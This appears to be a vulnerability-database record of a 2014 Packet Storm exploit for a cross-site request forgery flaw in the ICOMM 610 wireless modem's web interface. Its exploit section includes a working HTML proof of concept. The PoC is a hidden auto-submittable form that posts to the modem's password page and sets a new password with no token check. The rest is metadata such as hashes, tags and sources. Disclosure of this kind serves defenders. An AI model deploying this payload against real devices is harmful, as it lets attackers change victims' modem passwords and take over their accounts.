ID

VAR-E-201404-0126


TITLE

ICOMM 610 Wireless Modem Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 125978

DESCRIPTION

ICOMM 610 wireless modem suffers from a cross site request forgery vulnerability.

Trust: 0.5

sources: PACKETSTORM: 125978

AFFECTED PRODUCTS

vendor:icommmodel:wireless modemscope:eqversion:610

Trust: 0.5

sources: PACKETSTORM: 125978

EXPLOIT

Exploit Title : ICOMM 610 Wireless Modem CSRF Vulnerability

Google dork : N/A

Date : 02/04/2014

Exploit Author : Blessen Thomas

Vendor Homepage : http://www.icommtele.com/

Software Link : N/A

Version : ICOMM 610

Tested on : Device software version 01.01.08.991 (10/01/2010)

Type of Application : Modem Web Application

CVE : N/A

Cross Site Request Forgery

It was observed that this modem's Web Application , suffers from Cross-site

request forgery through which attacker can manipulate user data via sending
him malicious craft url.


At attacker could change the password of the victim's account without the
victim's knowledge as the

application is not having a security token implemented.


The Modem's application is not using any security token to prevent it
against CSRF. You can manipulate any userdata. PoC and Exploit to change
user password: In the POC the IP address in the POST is the modems IP
address.



<html>
<!-- CSRF PoC --->
<body>
<form action="http://192.168.1.1/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
<input type="hidden" name="PasswdEnable" value="on" />
<input type="hidden" name="New_Passwd" value="test" />
<input type="hidden" name="Confirm_New_Passwd" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Trust: 0.5

sources: PACKETSTORM: 125978

EXPLOIT HASH

LOCAL

SOURCE

md5: bce0847fc63f25be3109848772f5c52c
sha-1: 2c5151238aa4cff0b74e4f7b4e57abef5af74b9f
sha-256: 21f6e63b81cb81511aa9c5520164732e3b61380d8954cd91b6668d2b521cf7ba
md5: bce0847fc63f25be3109848772f5c52c

Trust: 0.5

sources: PACKETSTORM: 125978

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 125978

TYPE

csrf

Trust: 0.5

sources: PACKETSTORM: 125978

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 125978

CREDITS

Blessen Thomas

Trust: 0.5

sources: PACKETSTORM: 125978

EXTERNAL IDS

db:PACKETSTORMid:125978

Trust: 0.5

sources: PACKETSTORM: 125978

SOURCES

db:PACKETSTORMid:125978

LAST UPDATE DATE

2022-07-27T09:58:47.138000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:125978date:2014-04-02T09:22:22